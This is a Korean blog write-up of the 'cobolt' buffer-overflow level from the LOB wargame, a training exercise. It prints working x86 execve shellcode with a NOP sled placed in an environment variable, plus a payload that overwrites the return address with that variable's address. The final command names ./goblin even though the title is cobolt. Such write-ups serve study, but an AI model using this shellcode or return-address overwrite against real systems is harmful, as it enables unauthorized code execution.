Pwnable/LOB

[LOB] cobolt 문제 풀이!

RootJJang 2022. 5. 12. 11:51
SMALL

소스코드 확인!

 

저번 문제와 buffer의 크기는 같지만 입력 방식이 인자로 받아주는 게 아니라 stdin으로 받아주네요

 

저것 빼고는 저번 문제와 풀이 방법이 똑같네요

 

https://qpalzm1029.tistory.com/35

 

[LOB] gremlin 문제 풀이!

cat 소스코드 이번엔 buffer 크기가 작아서 쉘코드를 직접 넣는 방법은 사용 못하겠네요 그렇다면 환경변수로 쉘코드를 설정해서 쉘코드의 주소를 RET으로 덮어보는 방법을 사용해 보겠슴다 shellcod

qpalzm1029.tistory.com

고런 기념으로 한 번만...

 

환경변수 shellcode를 설정해줍니다

 

export shellcode=`python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

 

이제 설정한 환경변수 shellcode의 주소를 구해봅시다

 

 

쉘코드 주소

 

페이로드는 dummy[20] + 0xbfffff0b

 

최종 페이로드 = (python -c 'print "\x90"*20 + "\x0b\xff\xff\xbf"'; cat) | ./goblin

 

 

LIST

'Pwnable > LOB' 카테고리의 다른 글

[LOB] wolfman 문제 풀이!!!!  (0) 2022.05.13
[LOB] orc 문제 풀이!!!!  (0) 2022.05.13
[LOB] goblin 문제 풀이!!!!  (0) 2022.05.12
[LOB] gremlin 문제 풀이!  (1) 2022.05.12
[LOB] gate 문제 풀이!  (2) 2022.05.12

'Pwnable/LOB'의 다른글

  • 현재글[LOB] cobolt 문제 풀이!

관련글

댓글

티스토리툴바